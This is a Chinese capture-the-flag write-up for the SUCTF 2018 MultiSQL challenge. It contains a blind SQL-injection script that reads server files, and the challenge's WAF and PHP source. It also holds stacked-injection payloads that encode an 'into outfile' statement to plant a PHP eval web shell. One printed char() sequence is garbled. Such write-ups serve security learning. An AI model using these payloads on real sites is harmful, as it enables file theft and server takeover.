SUCTF-2018-MultiSQL

摘要
sql堆叠注入、读取文件、写文件

• sql 读文件
• sql 写文件

进入题目，可以登录+注册，fuzz好像过滤挺多，但不太好看

登录后有一个信息页，可疑参数id+图片上传功能，限制了后缀

测试可知id处存在数字型注入，且hex未过滤

sql 读文件

# coding=utf-8
import requests
import time
import Func

flag = ""
url0 = "http://35d51ea9-d1ce-4398-83d3-db931ec5b398.node4.buuoj.cn:81/user/user.php?id={}"
cookie = {"PHPSESSID": "miq9eu5fc7i2qst8qslb0cuj42"}
data = '0x'

sql1 = "0^(hex(database())>={})"
# 库名
sql2 = ""
# 表名
sql3 = ""
# 列名
sql4 = ""
# 数据
what_file = Func.hex_Char("/var/www/html/index.php")
sql5 = "0^(hex(load_file(" + what_file + "))>={})"
# 读文件

url = url0.format(sql5)
# 选择查询语句

for x in range(1, 100):
    left = 48
    right = 90
    while right > left:
        mid = int((left + right + 1) / 2)
        x = str(x)
        y = str(mid)
        pay = url.format(data + hex(int(y)).replace('0x', ''))
        response = requests.get(url=pay, cookies=cookie)
        if "admin" in response.text:
            left = mid
        else:
            right = mid - 1
        time.sleep(0.09)  # 防止脏数据
        # print(pay)
    # print(pay)
    # print(response.text)
    data += str(hex(right)).replace('0x', '')
    flag += chr(right)
    # print(right)
    print(flag)
print(flag)

很多函数似乎被过滤了，测试可以load读取文件……

优化二分比较读取+缩小比较范围

sql 写文件

buu很难持续读下去……

读取index.php。发现包含了bwvs_config/config.php和waf.php

waf.php

function waf($str){
		$black_str = "/(and|or|union|sleep|select|substr|order|left|right|order|by|where|rand|exp|updatexml|insert|update|dorp|delete|[|]|[&])/i";
		$str = preg_replace($black_str, "@@",$str);
		return addslashes($str);
	}

user.php

if(isset($_GET['id'])){
		$id=waf($_GET['id']);
		$sql = "SELECT * FROM dwvs_user_message WHERE DWVS_user_id =".$id;
		$data = mysqli_multi_query($connect,$sql) or die();
		
		$result = mysqli_store_result($connect);
		$row = mysqli_fetch_row($result);
		echo '<h1>user_id:'.$row[0]."</h1><br><h2>user_name:".$row[1]."</h2><br><h3>注册时间：".$row[4]."</h3>";

在PHP中，mysqli_multi_query()函数可以多语句查询SQL，造成堆叠注入漏洞。

我们可以用char或hex来编码，用set + 预处理语句执行

# coding=utf-8

from __future__ import print_function
import Func

# 堆叠+预处理 写文件
set_sql = Func.hex_Char("select '<?php eval($_GET[ok]);?>' into outfile '/var/www/html/favicon/a.php';")
sql = "set @xx="+set_sql+";prepare x from @xx;execute x;"
print (sql, end="")

//set @xx=0x73656c65637420273c3f706870206576616c28245f4745545b6f6b5d293b3f3e2720696e746f206f757466696c6520272f7661722f7777772f68746d6c2f66617669636f6e2f612e706870273b;prepare x from @xx;execute x;

from __future__ import print_function

string = "select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"

print("char(", end='')
for char in string:
    if char == string[-1]:
        print('' + str(ord(char)) + "" + "", end='')
    else:
        print('' + str(ord(char)) + "," + "", end='')
print(")")
//char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,5963,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

http://35d51ea9-d1ce-4398-83d3-db931ec5b398.node4.buuoj.cn:81/user/user.php?id=2;+payload

再在shell.php上找flag即可

老是连不上……

参考文章:
[SUCTF 2018]MultiSQL(sql读取文件+写入文件)